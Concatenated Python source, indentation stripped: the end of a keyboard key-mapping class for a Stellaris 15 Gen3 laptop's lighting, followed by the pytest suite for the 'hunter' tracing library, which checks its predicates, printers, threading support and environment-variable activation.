position = self.default_map_inv[event.code]
self.callback_function(event.code, event.state, position)
def register_callback(self, callback):
self.callback_function = callback
def exit(self):
self.is_enabled = False
#def event_cb(code, state, position):
# print(code, state, position)
#keyboard_mapper = KeyboardMapper(event_cb)
#################################################################################################################
"""
# KEY MAPPINGS ARE FOUND WITH STELLARIS 15 GEN3 USING THIS CODE
import numpy as np
class CustomEffect:
def __init__(self, arr, driver):
self.arr = arr
self.driver = driver
self.i = 0
self.j = 15 # SELECT COLUMN HERE
def update(self):
self.arr = self.arr * 0
self.arr[self.i, self.j] = np.array([1.0, 1.0, 1.0])
self.i = (self.i + 1) % 6
return self.arr
def get_fps(self):
return 1
def is_enabled(self):
return True
def on_exit(self):
pass
"""
|
test_hunter.py
|
from __future__ import print_function
import inspect
import os
import platform
import subprocess
import sys
import threading
from pprint import pprint
import pytest
import hunter
from hunter import And
from hunter import CallPrinter
from hunter import CodePrinter
from hunter import Debugger
from hunter import From
from hunter import Not
from hunter import Or
from hunter import Q
from hunter import Query
from hunter import VarsPrinter
from hunter import When
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
pytest_plugins = 'pytester',
class FakeCallable(object):
def __init__(self, value):
self.value = value
def __call__(self):
raise NotImplementedError('Nope')
def __repr__(self):
return repr(self.value)
def __str__(self):
return str(self.value)
def __eq__(self, other):
return self.value == other.value
def __hash__(self):
return hash(self.value)
C = FakeCallable
class EvilTracer(object):
def __init__(self, *args, **kwargs):
self._calls = []
threading_support = kwargs.pop('threading_support', False)
clear_env_var = kwargs.pop('clear_env_var', False)
self.handler = hunter._prepare_predicate(*args, **kwargs)
self._tracer = hunter.trace(self._append, threading_support=threading_support, clear_env_var=clear_env_var)
def _append(self, event):
# Make sure the lineno is cached. Frames are reused
# and later on the events would be very broken ..
event.lineno
self._calls.append(event)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._tracer.stop()
predicate = self.handler
for call in self._calls:
predicate(call)
trace = EvilTracer
def _get_func_spec(func):
if hasattr(inspect, 'signature'):
return str(inspect.signature(func))
if hasattr(inspect, 'getfullargspec'):
spec = inspect.getfullargspec(func)
else:
spec = inspect.getargspec(func)
return inspect.formatargspec(spec.args, spec.varargs)
def test_pth_activation():
module_name = os.path.__name__
expected_module = '{0}.py'.format(module_name)
hunter_env = 'action=CodePrinter,module={!r},function="join"'.format(module_name)
func_spec = _get_func_spec(os.path.join)
expected_call = 'call def join{0}:'.format(func_spec)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample.py')],
env=dict(os.environ, PYTHONHUNTER=hunter_env),
stderr=subprocess.STDOUT,
)
assert expected_module.encode() in output
assert expected_call.encode() in output
def test_pth_sample4():
env = dict(os.environ, PYTHONHUNTER='CodePrinter')
env.pop('COVERAGE_PROCESS_START', None)
env.pop('COV_CORE_SOURCE', None)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample4.py')],
env=env,
stderr=subprocess.STDOUT,
)
assert output
def test_pth_sample2(LineMatcher):
env = dict(os.environ, PYTHONHUNTER="module='__main__',action=CodePrinter")
env.pop('COVERAGE_PROCESS_START', None)
env.pop('COV_CORE_SOURCE', None)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample2.py')],
env=env,
stderr=subprocess.STDOUT,
)
lm = LineMatcher(output.decode('utf-8').splitlines())
lm.fnmatch_lines([
'*tests*sample2.py:* call if __name__ == "__main__": #*',
'*tests*sample2.py:* line if __name__ == "__main__": #*',
'*tests*sample2.py:* line import functools',
'*tests*sample2.py:* line def deco(opt):',
'*tests*sample2.py:* line @deco(1)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* line @deco(2)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* line @deco(3)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* line foo(',
"*tests*sample2.py:* line 'a*',",
"*tests*sample2.py:* line 'b'",
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @deco(1)',
'* * | @deco(2)',
'* * | @deco(3)',
'* * [*] def foo(*args):',
'*tests*sample2.py:* line return args',
'*tests*sample2.py:* return return args',
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* line try:",
"*tests*sample2.py:* line None(",
"*tests*sample2.py:* line 'a',",
"*tests*sample2.py:* line 'b'",
"*tests*sample2.py:* exception *",
"* * ... exception value: *",
"*tests*sample2.py:* line except:",
"*tests*sample2.py:* line pass",
"*tests*sample2.py:* return pass",
"* ... return value: None",
])
def test_predicate_str_repr():
assert repr(Q(module='a', function='b')).endswith("predicates.Query: query_eq=(('function', 'b'), ('module', 'a'))>")
assert str(Q(module='a', function='b')) == "Query(function='b', module='a')"
assert repr(Q(module='a')).endswith("predicates.Query: query_eq=(('module', 'a'),)>")
assert str(Q(module='a')) == "Query(module='a')"
assert "predicates.When: condition=<hunter." in repr(Q(module='a', action=C('foo')))
assert "predicates.Query: query_eq=(('module', 'a'),)>, actions=('foo',)>" in repr(Q(module='a', action=C('foo')))
assert str(Q(module='a', action=C('foo'))) == "When(Query(module='a'), 'foo')"
assert "predicates.Not: predicate=<hunter." in repr(~Q(module='a'))
assert "predicates.Query: query_eq=(('module', 'a'),)>>" in repr(~Q(module='a'))
assert str(~Q(module='a')) == "Not(Query(module='a'))"
assert "predicates.Or: predicates=(<hunter." in repr(Q(module='a') | Q(module='b'))
assert "predicates.Query: query_eq=(('module', 'a'),)>, " in repr(Q(module='a') | Q(module='b'))
assert repr(Q(module='a') | Q(module='b')).endswith("predicates.Query: query_eq=(('module', 'b'),)>)>")
assert str(Q(module='a') | Q(module='b')) == "Or(Query(module='a'), Query(module='b'))"
assert "predicates.And: predicates=(<hunter." in repr(Q(module='a') & Q(module='b'))
assert "predicates.Query: query_eq=(('module', 'a'),)>," in repr(Q(module='a') & Q(module='b'))
assert repr(Q(module='a') & Q(module='b')).endswith("predicates.Query: query_eq=(('module', 'b'),)>)>")
assert str(Q(module='a') & Q(module='b')) == "And(Query(module='a'), Query(module='b'))"
def test_predicate_q_deduplicate_callprinter():
out = repr(Q(CallPrinter(), action=CallPrinter()))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter():
out = repr(Q(CodePrinter(), action=CodePrinter()))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_cls():
out = repr(Q(CallPrinter(), action=CallPrinter))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_cls():
out = repr(Q(CodePrinter(), action=CodePrinter))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_inverted():
out = repr(Q(CallPrinter(), action=CodePrinter()))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_inverted():
out = repr(Q(CodePrinter(), action=CallPrinter()))
assert out.startswith('CodePrinter(')
def test_predicate_q_deduplicate_callprinter_cls_inverted():
out = repr(Q(CallPrinter(), action=CodePrinter))
assert out.startswith('CallPrinter(')
def test_predicate_q_deduplicate_codeprinter_cls_inverted():
out = repr(Q(CodePrinter(), action=CallPrinter))
assert out.startswith('CodePrinter(')
def test_predicate_q_action_callprinter():
out = repr(Q(action=CallPrinter()))
assert 'condition=<hunter.' in out
assert 'actions=(CallPrinter' in out
def test_predicate_q_action_codeprinter():
out = repr(Q(action=CodePrinter()))
assert 'condition=<hunter.' in out
assert 'actions=(CodePrinter' in out
def test_predicate_q_nest_1():
assert repr(Q(Q(module='a'))).endswith("predicates.Query: query_eq=(('module', 'a'),)>")
def test_predicate_q_not_callable():
exc = pytest.raises(TypeError, Q, 'foobar')
assert exc.value.args == ("Predicate 'foobar' is not callable.",)
def test_predicate_q_expansion():
assert Q(C(1), C(2), module=3) == And(C(1), C(2), Q(module=3))
assert Q(C(1), C(2), module=3, action=C(4)) == When(And(C(1), C(2), Q(module=3)), C(4))
assert Q(C(1), C(2), module=3, actions=[C(4), C(5)]) == When(And(C(1), C(2), Q(module=3)), C(4), C(5))
@pytest.fixture
def mockevent():
return hunter.Event(sys._getframe(0), 'line', None, hunter.Tracer())
def test_predicate_and(mockevent):
assert And(C(1), C(2)) == And(C(1), C(2))
assert Q(module=1) & Q(module=2) == And(Q(module=1), Q(module=2))
assert Q(module=1) & Q(module=2) & Q(module=3) == And(Q(module=1), Q(module=2), Q(module=3))
assert (Q(module=__name__) & Q(module='foo'))(mockevent) is False
assert (Q(module=__name__) & Q(function='mockevent'))(mockevent) is True
assert And(1, 2) | 3 == Or(And(1, 2), 3)
def test_predicate_or(mockevent):
assert Q(module=1) | Q(module=2) == Or(Q(module=1), Q(module=2))
assert Q(module=1) | Q(module=2) | Q(module=3) == Or(Q(module=1), Q(module=2), Q(module=3))
assert (Q(module='foo') | Q(module='bar'))(mockevent) == False
assert (Q(module='foo') | Q(module=__name__))(mockevent) == True
assert Or(1, 2) & 3 == And(Or(1, 2), 3)
def test_tracing_bare(LineMatcher):
lines = StringIO()
with hunter.trace(CodePrinter(stream=lines)):
def a():
return 1
b = a()
b = 2
try:
raise Exception('BOOM!')
except Exception:
pass
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py* call def a():",
"*test_hunter.py* line return 1",
"*test_hunter.py* return return 1",
"* ... return value: 1",
])
def test_tracing_reinstall(LineMatcher):
lines = StringIO()
with hunter.trace(CodePrinter(stream=lines)):
def foo():
a = 2
sys.settrace(sys.gettrace())
a = 3
def bar():
a = 1
foo()
a = 4
bar()
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py:* call def bar():",
"*test_hunter.py:* line a = 1",
"*test_hunter.py:* line foo()",
"*test_hunter.py:* call def foo():",
"*test_hunter.py:* line a = 2",
"*test_hunter.py:* line sys.settrace(sys.gettrace())",
"*test_hunter.py:* line a = 3",
"*test_hunter.py:* return a = 3",
"* ... return value: None",
"*test_hunter.py:* line a = 4",
"*test_hunter.py:* return a = 4",
"* ... return value: None",
])
def test_mix_predicates_with_callables():
hunter._prepare_predicate(Q(module=1) | Q(lambda: 2))
hunter._prepare_predicate(Q(lambda: 2) | Q(module=1))
hunter._prepare_predicate(Q(module=1) & Q(lambda: 2))
hunter._prepare_predicate(Q(lambda: 2) & Q(module=1))
hunter._prepare_predicate(Q(module=1) | (lambda: 2))
hunter._prepare_predicate((lambda: 2) | Q(module=1))
hunter._prepare_predicate(Q(module=1) & (lambda: 2))
hunter._prepare_predicate((lambda: 2) & Q(module=1))
def test_threading_support(LineMatcher):
lines = StringIO()
idents = set()
names = set()
started = threading.Event()
def record(event):
idents.add(event.threadid)
names.add(event.threadname)
return True
with hunter.trace(record,
actions=[CodePrinter(stream=lines), VarsPrinter('a', stream=lines), CallPrinter(stream=lines)],
threading_support=True):
def foo(a=1):
started.set()
print(a)
def main():
foo()
t = threading.Thread(target=foo)
t.start()
started.wait(10)
main()
lm = LineMatcher(lines.getvalue().splitlines())
assert idents - {t.ident} == {None}
assert 'MainThread' in names
assert any(name.startswith('Thread-') for name in names)
lm.fnmatch_lines_random([
'Thread-* *test_hunter.py:* call def foo(a=1):',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'Thread-* *test_hunter.py:* call => foo(a=1)',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'MainThread *test_hunter.py:* call def foo(a=1):',
'MainThread *test_hunter.py:* call [[]a => 1[]]',
'MainThread *test_hunter.py:* call => foo(a=1)',
'MainThread *test_hunter.py:* call [[]a => 1[]]',
])
@pytest.mark.parametrize('query', [{'threadid': None}, {'threadname': 'MainThread'}])
def test_thread_filtering(LineMatcher, query):
lines = StringIO()
idents = set()
names = set()
started = threading.Event()
def record(event):
idents.add(event.threadid)
names.add(event.threadname)
return True
with hunter.trace(~Q(**query), record,
actions=[CodePrinter(stream=lines), VarsPrinter('a', stream=lines), CallPrinter(stream=lines)],
threading_support=True):
def foo(a=1):
started.set()
print(a)
def main():
foo()
t = threading.Thread(target=foo)
t.start()
started.wait(10)
main()
lm = LineMatcher(lines.getvalue().splitlines())
print(lines.getvalue())
assert None not in idents
assert 'MainThread' not in names
pprint(lm.lines)
lm.fnmatch_lines_random([
'Thread-* *test_hunter.py:* call def foo(a=1):',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
'Thread-* *test_hunter.py:* call => foo(a=1)',
'Thread-* *test_hunter.py:* call [[]a => 1[]]',
])
def test_tracing_printing_failures(LineMatcher):
lines = StringIO()
with trace(actions=[CodePrinter(stream=lines), VarsPrinter('x', stream=lines)]):
class Bad(object):
__slots__ = []
def __repr__(self):
raise RuntimeError("I'm a bad class!")
def a():
x = Bad()
return x
def b():
x = Bad()
raise Exception(x)
a()
try:
b()
except Exception as exc:
pass
lm = LineMatcher(lines.getvalue().splitlines())
print(lines.getvalue())
lm.fnmatch_lines([
"""*tests*test_hunter.py:* call class Bad(object):""",
"""*tests*test_hunter.py:* line class Bad(object):""",
"""*tests*test_hunter.py:* line def __repr__(self):""",
"""*tests*test_hunter.py:* return def __repr__(self):""",
"""* ... return value: *""",
"""*tests*test_hunter.py:* call def a():""",
"""*tests*test_hunter.py:* line x = Bad()""",
"""*tests*test_hunter.py:* line return x""",
"""*tests*test_hunter.py:* line [[]x => !!! FAILED REPR: RuntimeError("I'm a bad class!"*)[]]""",
"""*tests*test_hunter.py:* return return x""",
"""* ... return value: !!! FAILED REPR: RuntimeError("I'm a bad class!"*)""",
"""*tests*test_hunter.py:* call def b():""",
"""*tests*test_hunter.py:* line x = Bad()""",
"""*tests*test_hunter.py:* line raise Exception(x)""",
"""*tests*test_hunter.py:* line [[]x => !!! FAILED REPR: RuntimeError("I'm a bad class!"*)[]]""",
"""*tests*test_hunter.py:* exception raise Exception(x)""",
"""* ... exception value: !!! FAILED REPR: RuntimeError("I'm a bad class!"*)""",
"""*tests*test_hunter.py:* return raise Exception(x)""",
"""* ... return value: None""",
])
def test_tracing_vars(LineMatcher):
lines = StringIO()
with hunter.trace(actions=[VarsPrinter('b', stream=lines), CodePrinter(stream=lines)]):
def a():
b = 1
b = 2
return 1
b = a()
b = 2
try:
raise Exception('BOOM!')
except Exception:
pass
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines([
"*test_hunter.py* call def a():",
"*test_hunter.py* line b = 1",
"*test_hunter.py* line [[]b => 1[]]",
"*test_hunter.py* line b = 2",
"*test_hunter.py* line [[]b => 2[]]",
"*test_hunter.py* line return 1",
"*test_hunter.py* return [[]b => 2[]]",
"*test_hunter.py* return return 1",
"* ... return value: 1",
])
def test_tracing_vars_expressions(LineMatcher):
lines = StringIO()
with hunter.trace(actions=[VarsPrinter('Foo.bar', 'vars(Foo)', 'len(range(2))', 'Foo.__dict__["bar"]', stream=lines)]):
def main():
class Foo(object):
bar = 1
main()
print(lines.getvalue())
lm = LineMatcher(lines.getvalue().splitlines())
lm.fnmatch_lines_random([
'* [[]Foo.bar => 1[]]',
'* [[]vars(Foo) => *[]]',
'* [[]len(range(2)) => 2[]]',
'* [[]Foo.__dict__[[]"bar"[]] => 1[]]',
])
def test_trace_merge():
with hunter.trace(function='a'):
with hunter.trace(function='b'):
with hunter.trace(function='c'):
assert sys.gettrace().handler == When(Q(function='c'), CallPrinter)
assert sys.gettrace().handler == When(Q(function='b'), CallPrinter)
assert sys.gettrace().handler == When(Q(function='a'), CallPrinter)
def test_trace_api_expansion():
# simple use
with trace(function='foobar') as t:
assert t.handler == When(Q(function='foobar'), CallPrinter)
# 'or' by expression
with trace(module='foo', function='foobar') as t:
assert t.handler == When(Q(module='foo', function='foobar'), CallPrinter)
# pdb.set_trace
with trace(function='foobar', action=Debugger) as t:
assert str(t.handler) == str(When(Q(function='foobar'), Debugger))
# pdb.set_trace on any hits
with trace(module='foo', function='foobar', action=Debugger) as t:
assert str(t.handler) == str(When(Q(module='foo', function='foobar'), Debugger))
# pdb.set_trace when function is foobar, otherwise just print when module is foo
with trace(Q(function='foobar', action=Debugger), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), Debugger),
Q(module='foo')
), CallPrinter))
# dumping variables from stack
with trace(Q(function='foobar', action=VarsPrinter('foobar')), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar')),
Q(module='foo'),
), CallPrinter))
with trace(Q(function='foobar', action=VarsPrinter('foobar', 'mumbojumbo')), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar', 'mumbojumbo')),
Q(module='foo'),
), CallPrinter))
# multiple actions
with trace(Q(function='foobar', actions=[VarsPrinter('foobar'), Debugger]), module='foo') as t:
assert str(t.handler) == str(When(And(
When(Q(function='foobar'), VarsPrinter('foobar'), Debugger),
Q(module='foo'),
), CallPrinter))
def test_locals():
out = StringIO()
with hunter.trace(
lambda event: event.locals.get('node') == 'Foobar',
module='test_hunter',
function='foo',
action=CodePrinter(stream=out)
):
def foo():
a = 1
node = 'Foobar'
node += 'x'
a += 2
return a
foo()
assert out.getvalue().endswith("node += 'x'\n")
def test_fullsource_decorator_issue(LineMatcher):
out = StringIO()
with trace(kind='call', action=CodePrinter(stream=out)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
'* call @foo',
'* | @bar',
'* * def foo():',
])
def test_callprinter(LineMatcher):
out = StringIO()
with trace(action=CallPrinter(stream=out)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
'* call => <lambda>(x=<function *foo at *>)',
'* line foo = bar = lambda x: x',
'* return <= <lambda>: <function *foo at *>',
'* call => <lambda>(x=<function *foo at *>)',
'* line foo = bar = lambda x: x',
'* return <= <lambda>: <function *foo at *>',
'* call => foo()',
'* line return 1',
'* return <= foo: 1',
])
def test_callprinter_indent(LineMatcher):
from sample6 import bar
out = StringIO()
with trace(action=CallPrinter(stream=out)):
bar()
lm = LineMatcher(out.getvalue().splitlines())
lm.fnmatch_lines([
"*sample6.py:1 call => bar()",
"*sample6.py:2 line foo()",
"*sample6.py:5 call => foo()",
"*sample6.py:6 line try:",
"*sample6.py:7 line asdf()",
"*sample6.py:16 call => asdf()",
"*sample6.py:17 line raise Exception()",
"*sample6.py:17 exception ! asdf: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:17 return <= asdf: None",
"*sample6.py:7 exception ! foo: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:8 line except:",
"*sample6.py:9 line pass",
"*sample6.py:10 line try:",
"*sample6.py:11 line asdf()",
"*sample6.py:16 call => asdf()",
"*sample6.py:17 line raise Exception()",
"*sample6.py:17 exception ! asdf: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:17 return <= asdf: None",
"*sample6.py:11 exception ! foo: (<*Exception'>, Exception(), <traceback object at *>)",
"*sample6.py:12 line except:",
"*sample6.py:13 line pass",
"*sample6.py:13 return <= foo: None",
"*sample6.py:2 return <= bar: None",
])
def test_source(LineMatcher):
calls = []
with trace(action=lambda event: calls.append(event.source)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
' foo = bar = lambda x: x\n',
' @foo\n',
' return 1\n',
])
def test_wraps(LineMatcher):
calls = []
@hunter.wrap(action=lambda event: calls.append('%6r calls=%r depth=%r %s' % (event.kind, event.calls, event.depth, event.fullsource)))
def foo():
return 1
foo()
lm = LineMatcher(calls)
for line in calls:
print(repr(line))
lm.fnmatch_lines([
"'call' calls=0 depth=0 @hunter.wrap*",
"'line' calls=1 depth=1 return 1\n",
"'return' calls=1 depth=0 return 1\n",
])
for call in calls:
assert 'tracer.stop()' not in call
def test_wraps_local(LineMatcher):
calls = []
def bar():
for i in range(2):
return 'A'
@hunter.wrap(local=True, action=lambda event: calls.append(
'%06s calls=%s depth=%s %s' % (event.kind, event.calls, event.depth, event.fullsource)))
def foo():
bar()
return 1
foo()
lm = LineMatcher(calls)
for line in calls:
print(repr(line))
lm.fnmatch_lines([
' call calls=0 depth=0 @hunter.wrap*',
' line calls=? depth=1 return 1\n',
'return calls=? depth=0 return 1\n',
])
for call in calls:
assert 'for i in range(2)' not in call
assert 'tracer.stop()' not in call
@pytest.mark.skipif('os.environ.get("SETUPPY_CFLAGS") == "-DCYTHON_TRACE=1"')
def test_depth():
calls = []
tracer = hunter.trace(action=lambda event: calls.append((event.kind, event.module, event.function, event.depth)))
try:
def bar():
for i in range(2):
yield i
def foo():
gen = bar()
next(gen)
while True:
try:
gen.send('foo')
except StopIteration:
break
list(i for i in range(2))
x = [i for i in range(2)]
foo()
finally:
tracer.stop()
pprint(calls)
assert ('call', 'test_hunter', 'bar', 1) in calls
assert ('return', 'test_hunter', 'foo', 0) in calls
def test_source_cython(LineMatcher):
pytest.importorskip('sample5')
calls = []
from sample5 import foo
with trace(action=lambda event: calls.append(event.source)):
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
'def foo():\n',
' return 1\n',
])
def test_fullsource(LineMatcher):
calls = []
with trace(action=lambda event: calls.append(event.fullsource)):
foo = bar = lambda x: x
@foo
@bar
def foo():
return 1
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
' foo = bar = lambda x: x\n',
' @foo\n @bar\n def foo():\n',
' return 1\n',
])
def test_fullsource_cython(LineMatcher):
pytest.importorskip('sample5')
calls = []
from sample5 import foo
with trace(action=lambda event: calls.append(event.fullsource)):
foo()
lm = LineMatcher(calls)
lm.fnmatch_lines([
'def foo():\n',
' return 1\n',
])
def test_debugger(LineMatcher):
out = StringIO()
calls = []
class FakePDB:
def __init__(self, foobar=1):
calls.append(foobar)
def set_trace(self, frame):
calls.append(frame.f_code.co_name)
with hunter.trace(
lambda event: event.locals.get('node') == 'Foobar',
module='test_hunter',
function='foo',
actions=[CodePrinter,
VarsPrinter('a', 'node', 'foo', 'test_debugger', stream=out),
Debugger(klass=FakePDB, foobar=2)]
):
def foo():
a = 1
node = 'Foobar'
node += 'x'
a += 2
return a
foo()
print(out.getvalue())
assert calls == [2, 'foo']
lm = LineMatcher(out.getvalue().splitlines())
pprint(lm.lines)
lm.fnmatch_lines_random([
"* [[]test_debugger => <function test_debugger at *[]]",
"* [[]node => 'Foobar'[]]",
"* [[]a => 1[]]",
])
def test_custom_action():
calls = []
with trace(action=lambda event: calls.append(event.function), kind='return'):
def foo():
return 1
foo()
assert 'foo' in calls
def test_trace_with_class_actions():
with trace(CodePrinter):
def a():
pass
a()
def test_predicate_no_inf_recursion(mockevent):
assert Or(And(1)) == 1
assert Or(Or(1)) == 1
assert And(Or(1)) == 1
assert And(And(1)) == 1
predicate = Q(Q(lambda ev: 1, module='wat'))
print('predicate:', predicate)
predicate(mockevent)
def test_predicate_compression():
assert Or(Or(1, 2), And(3)) == Or(1, 2, 3)
assert Or(Or(1, 2), 3) == Or(1, 2, 3)
assert Or(1, Or(2, 3), 4) == Or(1, 2, 3, 4)
assert And(1, 2, Or(3, 4)).predicates == (1, 2, Or(3, 4))
assert repr(Or(Or(1, 2), And(3))) == repr(Or(1, 2, 3))
assert repr(Or(Or(1, 2), 3)) == repr(Or(1, 2, 3))
assert repr(Or(1, Or(2, 3), 4)) == repr(Or(1, 2, 3, 4))
def test_predicate_not(mockevent):
assert Not(1).predicate == 1
assert ~Or(1, 2) == Not(Or(1, 2))
assert ~And(1, 2) == Not(And(1, 2))
assert ~Not(1) == 1
assert ~Query(module=1) | ~Query(module=2) == Not(And(Query(module=1), Query(module=2)))
assert ~Query(module=1) & ~Query(module=2) == Not(Or(Query(module=1), Query(module=2)))
assert ~Query(module=1) | Query(module=2) == Or(Not(Query(module=1)), Query(module=2))
assert ~Query(module=1) & Query(module=2) == And(Not(Query(module=1)), Query(module=2))
assert ~(Query(module=1) & Query(module=2)) == Not(And(Query(module=1), Query(module=2)))
assert ~(Query(module=1) | Query(module=2)) == Not(Or(Query(module=1), Query(module=2)))
assert repr(~Or(1, 2)) == repr(Not(Or(1, 2)))
assert repr(~And(1, 2)) == repr(Not(And(1, 2)))
assert repr(~Query(module=1) | ~Query(module=2)) == repr(Not(And(Query(module=1), Query(module=2))))
assert repr(~Query(module=1) & ~Query(module=2)) == repr(Not(Or(Query(module=1), Query(module=2))))
assert repr(~(Query(module=1) & Query(module=2))) == repr(Not(And(Query(module=1), Query(module=2))))
assert repr(~(Query(module=1) | Query(module=2))) == repr(Not(Or(Query(module=1), Query(module=2))))
assert Not(Q(module=__name__))(mockevent) == False
def test_predicate_query_allowed():
pytest.raises(TypeError, Query, 1)
pytest.raises(TypeError, Query, a=1)
def test_predicate_when_allowed():
pytest.raises(TypeError, When, 1)
@pytest.mark.parametrize('expr,expected', [
({'module': 'test_hunter'}, True),
({'module': 'test_hunterr'}, False),
({'module': 'test_hunter.'}, False),
({'module_startswith': 'test'}, True),
({'module__startswith': 'test'}, True),
({'module_contains': 'test'}, True),
({'module_contains': 'foo'}, False),
({'module_endswith': 'foo'}, False),
({'module__endswith': 'hunter'}, True),
({'module_in': 'test_hunter'}, True),
({'module': 'abcd'}, False),
({'module': ['abcd']}, False),
({'module_in': ['abcd']}, False),
({'module_in': ['a', 'test_hunter', 'd']}, True),
({'module': 'abcd'}, False),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': {'abc', 'test'}}, True),
({'module_startswith': ['abc', 'test']}, True),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': ('abc', 'test')}, True),
({'module_startswith': ('abc', 'xyz')}, False),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': {'abc', 'hunter'}}, True),
({'module_endswith': ['abc', 'hunter']}, True),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': ('abc', 'hunter')}, True),
({'module_endswith': ('abc', 'xyz')}, False),
({'module': 'abc'}, False),
({'module_regex': r'(hunter|hunter.*)\b'}, False),
({'module_regex': r'(test|test.*)\b'}, True),
])
def test_predicate_matching(expr, mockevent, expected):
assert Query(**expr)(mockevent) == expected
@pytest.mark.parametrize('exc_type,expr', [
(TypeError, {'module_1': 1}),
(TypeError, {'module1': 1}),
(ValueError, {'module_startswith': 1}),
(ValueError, {'module_startswith': {1: 2}}),
(ValueError, {'module_endswith': 1}),
(ValueError, {'module_endswith': {1: 2}}),
(TypeError, {'module_foo': 1}),
(TypeError, {'module_a_b': 1}),
])
def test_predicate_bad_query(expr, exc_type):
pytest.raises(exc_type, Query, **expr)
def test_predicate_when(mockevent):
called = []
assert When(Q(module='foo'), lambda ev: called.append(ev))(mockevent) == False
assert called == []
assert When(Q(module=__name__), lambda ev: called.append(ev))(mockevent) == True
assert called == [mockevent]
called = []
assert Q(module=__name__, action=lambda ev: called.append(ev))(mockevent) == True
assert called == [mockevent]
called = [[], []]
predicate = (
Q(module=__name__, action=lambda ev: called[0].append(ev)) |
Q(module='foo', action=lambda ev: called[1].append(ev))
)
assert predicate(mockevent) == True
assert called == [[mockevent], []]
assert predicate(mockevent) == True
assert called == [[mockevent, mockevent], []]
called = [[], []]
predicate = (
Q(module=__name__, action=lambda ev: called[0].append(ev)) &
Q(function='mockevent', action=lambda ev: called[1].append(ev))
)
assert predicate(mockevent) == True
assert called == [[mockevent], [mockevent]]
def test_and_or_kwargs():
assert And(1, function=2) == And(1, Query(function=2))
assert Or(1, function=2) == Or(1, Query(function=2))
def test_proper_backend():
if os.environ.get('PUREPYTHONHUNTER') or platform.python_implementation() == 'PyPy':
assert 'hunter.tracer.Tracer' in repr(hunter.Tracer)
else:
assert 'hunter._tracer.Tracer' in repr(hunter.Tracer)
@pytest.fixture(params=['pure', 'cython'])
def tracer_impl(request):
if request.param == 'pure':
Tracer = pytest.importorskip('hunter.tracer').Tracer
elif request.param == 'cython':
Tracer = pytest.importorskip('hunter._tracer').Tracer
if Tracer is not hunter.Tracer:
pytest.skip("Not %s in this environment" % Tracer)
